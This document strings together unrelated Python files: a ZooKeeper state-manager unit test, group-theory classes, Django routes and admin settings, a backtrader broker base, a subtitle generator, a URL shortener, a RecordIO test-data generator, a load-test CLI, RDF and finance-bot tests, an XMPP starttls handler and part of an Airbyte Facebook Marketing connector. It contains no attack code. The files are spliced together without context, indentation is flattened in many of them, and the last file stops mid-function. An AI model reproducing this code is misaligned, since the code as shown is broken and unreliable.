|
# Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''ZkStateManager unittest'''
import unittest2 as unittest
from heron.statemgrs.src.python.zkstatemanager import ZkStateManager
class ZkStateManagerTest(unittest.TestCase):
"""Unittest for ZkStateManager"""
class MockKazooClient:
def __init__(self):
self.start_calls = 0
self.stop_calls = 0
def start(self):
self.start_calls = self.start_calls + 1
def stop(self):
self.stop_calls = self.stop_calls + 1
def add_listener(self,listener):
pass
def setUp(self):
        # Create a ZkStateManager that we will test with
self.statemanager = ZkStateManager('zk', [('localhost', 2181), ('localhost', 2281)], 'heron', 'reachable.host')
# replace creation of a KazooClient
self.mock_kazoo = ZkStateManagerTest.MockKazooClient()
self.opened_host_ports = []
def kazoo_client(hostport):
self.opened_host_ports.append(hostport)
return self.mock_kazoo
self.statemanager._kazoo_client = kazoo_client
def test_start_checks_for_connection(self):
global did_connection_check
did_connection_check = False
def connection_check():
global did_connection_check
did_connection_check = True
return True
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.start()
self.assertTrue(did_connection_check)
def test_start_uses_host_ports(self):
def connection_check():
return True
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.start()
self.assertEqual('localhost:2181,localhost:2281',self.opened_host_ports[0])
def test_start_opens_proxy_if_no_connection(self):
def connection_check():
return False
global did_open_proxy
did_open_proxy = False
def open_proxy():
global did_open_proxy
did_open_proxy = True
return [('proxy', 2181), ('proxy-2', 2281)]
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.establish_ssh_tunnel = open_proxy
self.statemanager.start()
self.assertTrue(did_open_proxy)
def test_proxied_start_uses_connection(self):
def connection_check():
return False
def open_proxy():
return [('smorgasboard',2200),('smorgasboard',2201)]
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.establish_ssh_tunnel = open_proxy
self.statemanager.start()
self.assertEqual('smorgasboard:2200,smorgasboard:2201',self.opened_host_ports[0])
|
class Node(object):
"""
Represents a node in a contingent plan.
Only the stated fields are mandatory.
Other optional info can be added by ConfigurationProvider implementations
"""
def __init__(self, id, partial_state, is_initial, is_goal):
self._is_initial = is_initial
self._is_goal = is_goal
self._id = id
self._partial_state = partial_state
@property
def node_id(self):
return self._id
@property
def is_initial(self):
return self._is_initial
@property
def is_goal(self):
return self._is_goal
@property
def partial_state(self):
# partial state defined for the node
return self._partial_state
def __hash__(self):
return hash(self._id)
def __eq__(self, other):
return self.node_id == other.node_id
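# Example (illustrative):
#   n = Node(id="n0", partial_state={"holding": True}, is_initial=True, is_goal=False)
#   n.node_id   # -> "n0"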
|
from groups import Group
from operator import itemgetter
class Subgroup(Group):
"""
Define subgroup by generators or by set of elements
"""
def __init__(self, G, gens = None, H = None):
if isinstance(G,Subgroup):
H = list(itemgetter(*H)(G._H)) if len(H)>1 else [G._H[list(H)[0]]]
G = G.G
if H is None:
H = self.__genSubgroup(G, gens)
self.card = len(H)
if type(H) == set:
H = list(H)
H.sort()
self._H = H
d = {H[i]: i for i in range(len(H))}
self.element = lambda k: G[H[k]]
self.index = lambda e: d[e]
self.op = lambda a, b: d[G.op(H[a],H[b])]
self.inverse = lambda g: d[G.inverse(H[g])]
self.abelian = None
self.cyclic = None
self.simple = None
self.id = d[G.identity()]
self.generators = [d[gen] for gen in gens] if gens is not None else None
self.G = G
def __genSubgroup(self, G, gens):
H = [G.identity()]
S = {G.identity()}
size = 1
while True:
for g in gens:
for h in H:
p = G.op(h, g)
if p not in S:
H.append(p)
S.add(p)
if size == len(H):
break
size = len(H)
H.sort()
return H
def __iter__(self):
return SubgroupIter(self)
def __repr__(self):
if self.generators is not None:
return "<"+",".join(str(self.G[g]) for g in self.generators)+">"
else:
return repr(self._H)
class SubgroupIter():
def __init__(self, G):
self.H = G._H
self.index = 0
def __next__(self):
if self.index < len(self.H):
## g = self.H[self.index]
self.index += 1
return self.index-1
raise StopIteration()
|
from django.conf.urls import patterns, include, url
from rest_framework import routers
import views
router = routers.DefaultRouter()
router.register(r'attempt', views.AttemptViewSet, base_name='attempt')
router.register(r'repository', views.RepositoryViewSet, base_name='repository')
urlpatterns = patterns('',
url(r'^api/', include(router.urls)),
url(r'^api/repositories/', views.RepositoryListView.as_view()),
url(r'^$', 'library.views.home', name='home'),
url(r'^repositories/$', 'library.views.repositories', name='repositories'),
url(r'^repository/(?P<user_name>.+)/(?P<repo_name>.+)/', 'library.views.repository', name='repository'),
url(r'^attempt/(?P<id>\d+)/', 'library.views.attempt', name='attempt'),
url(r'^queries/(?P<id>\d+)/', 'library.views.queries', name='queries'),
url(r'^about/$', 'library.views.about', name='about'),
url(r'^search/$', 'library.views.search', name='search')
)
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015, 2016, 2017 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader.comminfo import CommInfoBase
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import with_metaclass
from . import fillers as fillers
from . import fillers as filler
class MetaBroker(MetaParams):
def __init__(cls, name, bases, dct):
'''
Class has already been created ... fill missing methods if needed be
'''
# Initialize the class
super(MetaBroker, cls).__init__(name, bases, dct)
translations = {
'get_cash': 'getcash',
'get_value': 'getvalue',
}
for attr, trans in translations.items():
if not hasattr(cls, attr):
                setattr(cls, attr, getattr(cls, trans))
class BrokerBase(with_metaclass(MetaBroker, object)):
params = (
('commission', CommInfoBase(percabs=True)),
)
def __init__(self):
self.comminfo = dict()
self.init()
def init(self):
# called from init and from start
if None not in self.comminfo:
self.comminfo = dict({None: self.p.commission})
def start(self):
self.init()
def stop(self):
pass
def add_order_history(self, orders, notify=False):
'''Add order history. See cerebro for details'''
raise NotImplementedError
def set_fund_history(self, fund):
'''Add fund history. See cerebro for details'''
raise NotImplementedError
def getcommissioninfo(self, data):
'''Retrieves the ``CommissionInfo`` scheme associated with the given
``data``'''
if data._name in self.comminfo:
return self.comminfo[data._name]
return self.comminfo[None]
def setcommission(self,
commission=0.0, margin=None, mult=1.0,
commtype=None, percabs=True, stocklike=False,
interest=0.0, interest_long=False, leverage=1.0,
automargin=False,
name=None):
        '''This method sets a ``CommissionInfo`` object for assets managed in
the broker with the parameters. Consult the reference for
``CommInfoBase``
If name is ``None``, this will be the default for assets for which no
other ``CommissionInfo`` scheme can be found
'''
comm = CommInfoBase(commission=commission, margin=margin, mult=mult,
commtype=commtype, stocklike=stocklike,
percabs=percabs,
interest=interest, interest_long=interest_long,
leverage=leverage, automargin=automargin)
self.comminfo[name] = comm
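    # Usage sketch (illustrative values and names): apply a 0.1% commission to
    # every asset by default, and a futures-like fixed-margin scheme only to
    # data feeds named 'fut':
    #   broker.setcommission(commission=0.001)
    #   broker.setcommission(commission=2.0, margin=1000.0, mult=10.0, name='fut')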
def addcommissioninfo(self, comminfo, name=None):
'''Adds a ``CommissionInfo`` object that will be the default for all assets if
``name`` is ``None``'''
self.comminfo[name] = comminfo
def getcash(self):
raise NotImplementedError
def getvalue(self, datas=None):
raise NotImplementedError
def get_fundshares(self):
'''Returns the current number of shares in the fund-like mode'''
return 1.0 # the abstract mode has only 1 share
fundshares = property(get_fundshares)
def get_fundvalue(self):
return self.getvalue()
fundvalue = property(get_fundvalue)
def set_fundmode(self, fundmode, fundstartval=None):
'''Set the actual fundmode (True or False)
If the argument fundstartval is not ``None``, it will used
'''
pass # do nothing, not all brokers can support this
def get_fundmode(self):
'''Returns the actual fundmode (True or False)'''
return False
fundmode = property(get_fundmode, set_fundmode)
def getposition(self, data):
raise NotImplementedError
def submit(self, order):
raise NotImplementedError
def cancel(self, order):
raise NotImplementedError
def buy(self, owner, data, size, price=None, plimit=None,
exectype=None, valid=None, tradeid=0, oco=None,
trailamount=None, trailpercent=None,
**kwargs):
raise NotImplementedError
def sell(self, owner, data, size, price=None, plimit=None,
exectype=None, valid=None, tradeid=0, oco=None,
trailamount=None, trailpercent=None,
**kwargs):
raise NotImplementedError
def next(self):
pass
# __all__ = ['BrokerBase', 'fillers', 'filler']
|
from babelsubs.generators.base import BaseGenerator, register
from babelsubs.utils import UNSYNCED_TIME_ONE_HOUR_DIGIT
class SBVGenerator(BaseGenerator):
file_type = 'sbv'
MAPPINGS = dict(linebreaks="[br]")
def __init__(self, subtitles_set, line_delimiter=u'\r\n', language=None):
super(SBVGenerator, self).__init__(subtitles_set, line_delimiter,
language)
def __unicode__(self):
output = []
for from_ms, to_ms, content, meta in self.subtitle_set.subtitle_items(self.MAPPINGS):
start = self.format_time(from_ms)
end = self.format_time(to_ms)
output.append(u'%s,%s' % (start, end))
output.append(content.strip())
output.append(u'')
return self.line_delimiter.join(output)
def format_time(self, time):
if time is None:
time = UNSYNCED_TIME_ONE_HOUR_DIGIT
seconds, milliseconds = divmod(int(time), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
return u'%01i:%02i:%02i.%03i' % (hours, minutes, seconds, milliseconds)
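    # Worked example (illustrative): format_time(3723456) -> u'1:02:03.456'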
register(SBVGenerator)
|
# lend admin
from django.contrib import admin
from django_admin_listfilter_dropdown.filters import RelatedDropdownFilter, DropdownFilter
from lend_models.class_models.lend_client import LendClientSet, LendClient
class LendClientSetAdmin(admin.ModelAdmin):
list_display = ['name', ]
list_per_page = 25
search_fields = ['name', ]
admin.site.register(LendClientSet, LendClientSetAdmin)
class LendClientAdmin(admin.ModelAdmin):
list_display = [
'client',
'created_date',
'updated_date',
'is_active',
]
list_display_links = [
'client',
]
list_per_page = 25
list_filter = (
# for ordinary fields
('created_date', DropdownFilter),
# for choice fields
# ('a_choicefield', ChoiceDropdownFilter),
# for related fields
# ('lend', RelatedDropdownFilter),
('client', RelatedDropdownFilter),
)
list_editable = [
'is_active'
]
# search_fields = []
inlines = []
admin.site.register(LendClient, LendClientAdmin)
|
import genkey
import db
import re
def genURL(data):
url = data
key = genkey.generateKey()
db.insert(key, url)
return ("localhost:8000/"+key)
def retURL(path):
    rankey = re.findall(r'/(.*)', path)
for i in rankey:
rankey = i
stourl = db.retrieve(rankey)
return stourl
# print("New URL: sho.rt/"+key)
# url = db.retrieve(key)
# print(url) |
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import argparse
import numpy as np
import struct
import sys
import tensorflow as tf
from random import randint
# Utility functions for generating a recordio encoded file of labeled numpy data
# for testing. Each file contains one or more records. Each record is a TensorFlow
# protobuf Example object. Each object contains an integer label and a numpy array
# encoded as a byte list.
# This file can be used in script mode to generate a single file or be used
# as a module to generate files via build_record_file.
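# On-disk layout of each record written by write_recordio below:
#   4-byte magic (_kmagic) | 4-byte payload length | payload | zero padding
# where the padding rounds the payload up to a 4-byte boundary.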
_kmagic = 0xced7230a
padding = {}
for amount in range(4):
if sys.version_info >= (3,):
padding[amount] = bytes([0x00 for _ in range(amount)])
else:
padding[amount] = bytearray([0x00 for _ in range(amount)])
def write_recordio(f, data):
"""Writes a single data point as a RecordIO record to the given file."""
length = len(data)
f.write(struct.pack('I', _kmagic))
f.write(struct.pack('I', length))
pad = (((length + 3) >> 2) << 2) - length
f.write(data)
f.write(padding[pad])
def string_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value.tostring()]))
def label_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def write_numpy_array(f, feature_name, label, arr):
feature = {'labels': label_feature(label), feature_name: string_feature(arr)}
example = tf.train.Example(features=tf.train.Features(feature=feature))
write_recordio(f, example.SerializeToString())
def build_record_file(filename, num_records, dimension, classes=2, data_feature_name='data'):
"""Builds a recordio encoded file of TF protobuf Example objects. Each object
    is a labeled numpy array. Each example has two fields - a single int64 'label'
field and a single bytes list field, containing a serialized numpy array.
Each generated numpy array is a multidimensional normal with
the specified dimension. The normal distribution is class specific, each class
has a different mean for the distribution, so it should be possible to learn
    a multiclass classifier on this data. Class means are deterministic - so multiple
calls to this function with the same number of classes will produce samples drawn
from the same distribution for each class.
Args:
filename - the file to write to
num_records - how many labeled numpy arrays to generate
classes - the cardinality of labels
data_feature_name - the name to give the numpy array in the Example object
dimension - the size of each numpy array.
"""
with open(filename, 'wb') as f:
for i in range(num_records):
cur_class = i % classes
loc = int(cur_class - (classes / 2))
write_numpy_array(f, data_feature_name, cur_class, np.random.normal(loc=loc, size=(dimension,)))
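# Module usage sketch (illustrative file name and sizes):
#   build_record_file('train.recordio', num_records=100, dimension=16, classes=4)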
def build_single_record_file(filename, dimension, classes=2, data_feature_name='data'):
cur_class = randint(0, classes - 1)
loc = int(cur_class - (classes / 2))
arr = np.random.normal(loc=loc, size=(dimension,))
feature = {'labels': label_feature(cur_class), data_feature_name: string_feature(arr)}
example = tf.train.Example(features=tf.train.Features(feature=feature))
with open(filename, 'wb') as f:
f.write(example.SerializeToString())
def validate_record_file(filename, dimension):
data = open(filename, 'rb').read()
magic_number, length = struct.unpack('II', data[0:8])
encoded = data[8:8 + length]
features = {
'data': tf.FixedLenFeature([], tf.string),
'labels': tf.FixedLenFeature([], tf.int64),
}
parsed = tf.parse_single_example(encoded, features)
x = tf.decode_raw(parsed['data'], tf.float64)
with tf.Session() as sess:
array = sess.run(x)
assert array.shape[0] == dimension
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Generate synthetic multi-class training data")
parser.add_argument('--dimension', default=65536, type=int)
parser.add_argument('--classes', default=2, type=int)
parser.add_argument('--num-records', default=4, type=int)
parser.add_argument('--data-feature-name', default='data')
parser.add_argument('filename', type=str)
args = parser.parse_args()
build_record_file(args.filename, args.num_records, args.dimension, args.classes, args.data_feature_name)
validate_record_file(args.filename, args.dimension)
|
import os
from typing import List, Dict, Any, Callable
from argparse import Namespace as Arguments
from platform import node as get_hostname
from . import EXECUTION_CONTEXT, MOUNT_CONTEXT
from .utils import (
find_variable_names_in_questions,
ask_yes_no, get_input,
distribution_of_users_per_scenario,
requirements,
)
from .argparse import ArgumentSubParser
from .argparse.bashcompletion import BashCompletionTypes
def create_parser(sub_parser: ArgumentSubParser, parent: str) -> None:
# grizzly-cli run ...
run_parser = sub_parser.add_parser('run', description='execute load test scenarios specified in a feature file.')
run_parser.add_argument(
'--verbose',
action='store_true',
required=False,
help=(
'changes the log level to `DEBUG`, regardless of what it says in the feature file. gives more verbose logging '
'that can be useful when troubleshooting a problem with a scenario.'
)
)
run_parser.add_argument(
'-T', '--testdata-variable',
action='append',
type=str,
required=False,
help=(
'specified in the format `<name>=<value>`. avoids being asked for an initial value for a scenario variable.'
)
)
run_parser.add_argument(
'-y', '--yes',
action='store_true',
default=False,
required=False,
help='answer yes on any questions that would require confirmation',
)
run_parser.add_argument(
'-e', '--environment-file',
type=BashCompletionTypes.File('*.yaml', '*.yml'),
required=False,
default=None,
help='configuration file with [environment specific information](/grizzly/usage/variables/environment-configuration/)',
)
run_parser.add_argument(
'file',
nargs=None,
type=BashCompletionTypes.File('*.feature'),
help='path to feature file with one or more scenarios',
)
if run_parser.prog != f'grizzly-cli {parent} run': # pragma: no cover
run_parser.prog = f'grizzly-cli {parent} run'
@requirements(EXECUTION_CONTEXT)
def run(args: Arguments, run_func: Callable[[Arguments, Dict[str, Any], Dict[str, List[str]]], int]) -> int:
# always set hostname of host where grizzly-cli was executed, could be useful
environ: Dict[str, Any] = {
'GRIZZLY_CLI_HOST': get_hostname(),
'GRIZZLY_EXECUTION_CONTEXT': EXECUTION_CONTEXT,
'GRIZZLY_MOUNT_CONTEXT': MOUNT_CONTEXT,
}
variables = find_variable_names_in_questions(args.file)
questions = len(variables)
manual_input = False
if questions > 0 and not getattr(args, 'validate_config', False):
print(f'feature file requires values for {questions} variables')
for variable in variables:
name = f'TESTDATA_VARIABLE_{variable}'
value = os.environ.get(name, '')
while len(value) < 1:
value = get_input(f'initial value for "{variable}": ')
manual_input = True
environ[name] = value
        print('the following values were provided:')
for key, value in environ.items():
if not key.startswith('TESTDATA_VARIABLE_'):
continue
print(f'{key.replace("TESTDATA_VARIABLE_", "")} = {value}')
if manual_input:
ask_yes_no('continue?')
if args.environment_file is not None:
environment_file = os.path.realpath(args.environment_file)
environ['GRIZZLY_CONFIGURATION_FILE'] = environment_file
if not getattr(args, 'validate_config', False):
distribution_of_users_per_scenario(args, environ)
run_arguments: Dict[str, List[str]] = {
'master': [],
'worker': [],
'common': ['--stop'],
}
if args.verbose:
run_arguments['common'] += ['--verbose', '--no-logcapture', '--no-capture', '--no-capture-stderr']
return run_func(args, environ, run_arguments)
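# Illustrative invocation (a sketch, not taken from the project's documentation). The
# parser above is mounted as `grizzly-cli <parent> run`; the actual parent sub-command
# name is not shown in this module, so "local" below is an assumption:
#
#   grizzly-cli local run --verbose -y \
#       -T my_variable=some-value \
#       -e environment.yaml \
#       features/scenario.feature
#
# `-T` pre-seeds the scenario variable so run() will not prompt for an initial value,
# and `-y` answers yes to any questions that would otherwise require confirmation.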
|
"""
Test Generate RDF from Assocs
"""
import rdflib
from rdflib.namespace import RDFS
from rdflib import compare
from ontobio.io.gafparser import GafParser
from ontobio.rdfgen.assoc_rdfgen import TurtleRdfWriter, CamRdfTransform
from ontobio.assoc_factory import AssociationSetFactory
from ontobio.ontol_factory import OntologyFactory
POMBASE = "tests/resources/truncated-pombase.gaf"
ONT = "tests/resources/go-truncated-pombase.json"
def test_parse():
ont = OntologyFactory().create(ONT)
p = GafParser()
assocs = p.parse(open(POMBASE, "r"))
#gen(assocs,SimpleAssocRdfTransform(),'simple')
gen(assocs, CamRdfTransform(), 'cam')
def test_rdfgen_includes_taxon_in_gp_class():
assoc = {
'source_line': 'PomBase\tSPAC25B8.17\typf1\t\tGO:1990578\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20150305\tPomBase\t\t',
'subject': {
'id': 'PomBase:SPAC25B8.17',
'label': 'ypf1',
'type': 'protein',
'fullname': 'intramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)',
'synonyms': ['ppp81'],
'taxon': {'id': 'NCBITaxon:4896'}
},
'object': {
'id': 'GO:1990578',
'taxon': 'NCBITaxon:4896'
},
'negated': False,
'qualifiers': [],
'aspect': 'C',
'relation': {'id': 'part_of'},
'interacting_taxon': None,
'evidence': {
'type': 'ISO',
'has_supporting_reference': ['GO_REF:0000024'],
'with_support_from': ['SGD:S000001583']
},
'provided_by': 'PomBase',
'date': '20150305',
"subject_extensions": [],
"object_extensions": {}
}
rdfWriter = TurtleRdfWriter(label="pombase_single.ttl")
gaf_transformer = CamRdfTransform(writer=rdfWriter)
gaf_transformer.translate(assoc)
gaf_transformer.provenance()
gp_res = rdfWriter.graph.query(gene_product_class_query())
for row in gp_res:
assert str(row["cls"]) == "http://identifiers.org/pombase/SPAC25B8.17"
assert str(row["taxon"]) == "http://purl.obolibrary.org/obo/NCBITaxon_4896"
def gene_product_class_query():
return """
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX NCBITaxon: <http://purl.obolibrary.org/obo/NCBITaxon_>
PREFIX RO: <http://purl.obolibrary.org/obo/RO_>
SELECT ?cls ?taxon
WHERE {
?cls rdfs:subClassOf [ a owl:Restriction ;
owl:onProperty RO:0002162 ;
owl:someValuesFrom ?taxon ] .
}
"""
def gen(assocs, tr, n):
fn = 'tests/resources/{}.rdf'.format(n)
tr.emit_header()
for a in assocs:
tr.translate(a)
tr.writer.serialize(destination=open(fn,'wb'))
#tr.writer.serialize(fn, 'ntriples')
|
import datetime
import unittest
from sqlalchemy.orm import sessionmaker
from bot.conversations.statistics.utils import get_consumptions_for_graph_user, get_earnings_for_graph_user
from bot.models import Base, Consumption, User, Earning
from tests.test_models import engine
from tests.utils_models import add_example_user, example_category_consumption, add_example_category_consumption, \
add_example_category_earning
Session = sessionmaker(bind=engine)
session = Session()
class GetConsumptionsForGraphUser(unittest.TestCase):
def setUp(self):
Base.metadata.create_all(engine)
add_example_user(session)
add_example_category_consumption(session)
def tearDown(self):
Base.metadata.drop_all(engine)
def test_time_period_has_not_dash(self):
time_period = '10.02.2020'
session.add(Consumption(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 11, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Consumption(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(100.0, 1)]
actual = get_consumptions_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
def test_time_period_has_dash(self):
time_period = '10.02.2020 - 12.02.2020'
session.add(Consumption(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 12, 14, 30, 10)))
session.add(Consumption(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Consumption(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(300.0, 1)]
actual = get_consumptions_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
class GetEarningForGraphUser(unittest.TestCase):
def setUp(self):
Base.metadata.create_all(engine)
add_example_user(session)
add_example_category_earning(session)
def tearDown(self):
Base.metadata.drop_all(engine)
def test_time_period_has_not_dash(self):
time_period = '10.02.2020'
session.add(Earning(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 11, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Earning(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(100.0, 1)]
actual = get_earnings_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
def test_time_period_has_dash(self):
time_period = '10.02.2020 - 12.02.2020'
session.add(Earning(user_id=1,
category_id=1,
amount_money=100,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 12, 14, 30, 10)))
session.add(Earning(user_id=1,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 9, 14, 30, 10)))
session.add(Earning(user_id=2,
category_id=1,
amount_money=200,
time_creation=datetime.datetime(2020, 2, 10, 14, 30, 10)))
session.commit()
user = session.query(User).get(1)
expected = [(300.0, 1)]
actual = get_earnings_for_graph_user(session, user, time_period)
self.assertListEqual(expected, actual)
|
# -*- coding: utf-8 -*-
from ..errors import XmppError
from ..stanzas import Stanza
NS_URI = "urn:ietf:params:xml:ns:xmpp-tls"
async def handle(stream, feature_elem, timeout=None):
nsmap = {"tls": NS_URI}
stream.send(Stanza("starttls", nsmap={None: NS_URI}))
resp = await stream.wait([("/tls:proceed", nsmap),
("/tls:failure", nsmap)], timeout=timeout)
if resp.name == "{%s}proceed" % NS_URI:
await stream._transport.starttls()
else:
# A real stanza/stream error type is not wrapped by the <failure/>,
# unlike other newer protocols, so gin up a dummy.
raise XmppError("starttls failure: %s" % resp.toXml().decode())
return True
def isRequired(feature_elem):
return ("{%s}required" % NS_URI) in [c.tag for c in feature_elem]
|
import torch
import torch.nn as nn
from glasses.models.classification.fishnet import FishNet, FishNetBottleNeck
from glasses.nn.att import SpatialSE
from torchinfo import summary
def test_fishnet():
device = torch.device('cpu')
    x = torch.rand(1, 3, 224, 224)
model = FishNet().eval()
pred = model(x)
assert pred.shape[-1] == 1000
# test fishnet99
model = FishNet.fishnet99().eval()
pred = model(x)
assert pred.shape[-1] == 1000
# n_params, _ = summary(model.to(device), (3, 224, 224), device=device)
    # # we know the correct number of parameters of fishnet
# assert n_params.item() == 16628904
# test fishnet150
model = FishNet.fishnet150().eval()
pred = model(x)
assert pred.shape[-1] == 1000
# n_params, _ = summary(model.to(device), (3, 224, 224), device=device)
    # # we know the correct number of parameters of fishnet
# assert n_params.item() == 24959400
block = lambda in_ch, out_ch, **kwargs: nn.Sequential(FishNetBottleNeck(in_ch, out_ch), SpatialSE(out_ch))
model = FishNet.fishnet99(block=block)
pred = model(x)
assert pred.shape[-1] == 1000
# summary(model.to(device), (3, 224, 224))
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import logging
from typing import Any, List, Mapping, Tuple, Type
import pendulum
from airbyte_cdk.models import AuthSpecification, ConnectorSpecification, DestinationSyncMode, OAuth2Specification
from airbyte_cdk.sources import AbstractSource
from airbyte_cdk.sources.streams import Stream
from source_facebook_marketing.api import API
from source_facebook_marketing.spec import ConnectorConfig, InsightConfig
from source_facebook_marketing.streams import (
Activities,
AdAccount,
AdCreatives,
Ads,
AdSets,
AdsInsights,
AdsInsightsActionType,
AdsInsightsAgeAndGender,
AdsInsightsCountry,
AdsInsightsDma,
AdsInsightsPlatformAndDevice,
AdsInsightsRegion,
Campaigns,
Images,
Videos,
)
logger = logging.getLogger("airbyte")
class SourceFacebookMarketing(AbstractSource):
def check_connection(self, _logger: "logging.Logger", config: Mapping[str, Any]) -> Tuple[bool, Any]:
"""Connection check to validate that the user-provided config can be used to connect to the underlying API
:param config: the user-input config object conforming to the connector's spec.json
:param _logger: logger object
:return Tuple[bool, Any]: (True, None) if the input config can be used to connect to the API successfully, (False, error) otherwise.
"""
config = ConnectorConfig.parse_obj(config)
if pendulum.instance(config.end_date) < pendulum.instance(config.start_date):
raise ValueError("end_date must be equal or after start_date.")
api = API(account_id=config.account_id, access_token=config.access_token)
logger.info(f"Select account {api.account}")
return True, None
    def streams(self, config: Mapping[str, Any]) -> List[Stream]:
"""Discovery method, returns available streams
:param config: A Mapping of the user input configuration as defined in the connector spec.
:return: list of the stream instances
"""
config: ConnectorConfig = ConnectorConfig.parse_obj(config)
api = API(account_id=config.account_id, access_token=config.access_token)
insights_args = dict(
api=api,
start_date=config.start_date,
end_date=config.end_date,
)
streams = [
AdAccount(api=api),
AdSets(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Ads(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
AdCreatives(api=api, fetch_thumbnail_images=config.fetch_thumbnail_images),
AdsInsights(**insights_args),
AdsInsightsAgeAndGender(**insights_args),
AdsInsightsCountry(**insights_args),
AdsInsightsRegion(**insights_args),
AdsInsightsDma(**insights_args),
AdsInsightsPlatformAndDevice(**insights_args),
AdsInsightsActionType(**insights_args),
Campaigns(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Images(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Videos(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
Activities(api=api, start_date=config.start_date, end_date=config.end_date, include_deleted=config.include_deleted),
]
return self._update_insights_streams(insights=config.custom_insights, default_args=insights_args, streams=streams)
def spec(self, *args, **kwargs) -> ConnectorSpecification:
"""Returns the spec for this integration.
The spec is a JSON-Schema object describing the required configurations
(e.g: username and password) required to run this integration.
"""
return ConnectorSpecification(
documentationUrl="https://docs.airbyte.io/integrations/sources/facebook-marketing",
changelogUrl="https://docs.airbyte.io/integrations/sources/facebook-marketing",
supportsIncremental=True,
supported_destination_sync_modes=[DestinationSyncMode.append],
connectionSpecification=ConnectorConfig.schema(),
authSpecification=AuthSpecification(
auth_type="oauth2.0",
oauth2Specification=OAuth2Specification(
rootObject=[], oauthFlowInitParameters=[], oauthFlowOutputParameters=[["access_token"]]
),
),
)
    def _update_insights_streams(self, insights: List[InsightConfig], default_args, streams) -> List[Stream]:
"""Update method, if insights have values returns streams replacing the
default insights streams else returns streams
"""
if not insights:
return streams
insights_custom_streams = list()
for insight in insights:
args = dict(
api=default_args["api"],
name=f"Custom{insight.name}",
fields=list(set(insight.fields)),
breakdowns=list(set(insight.breakdowns)),
action_breakdowns=list(set(insight.action_breakdowns)),
time_increment=insight.time_increment,
start_date=insight.start_date or default_args["start_date"],
end_date=insight.end_date or default_args["end_date"],
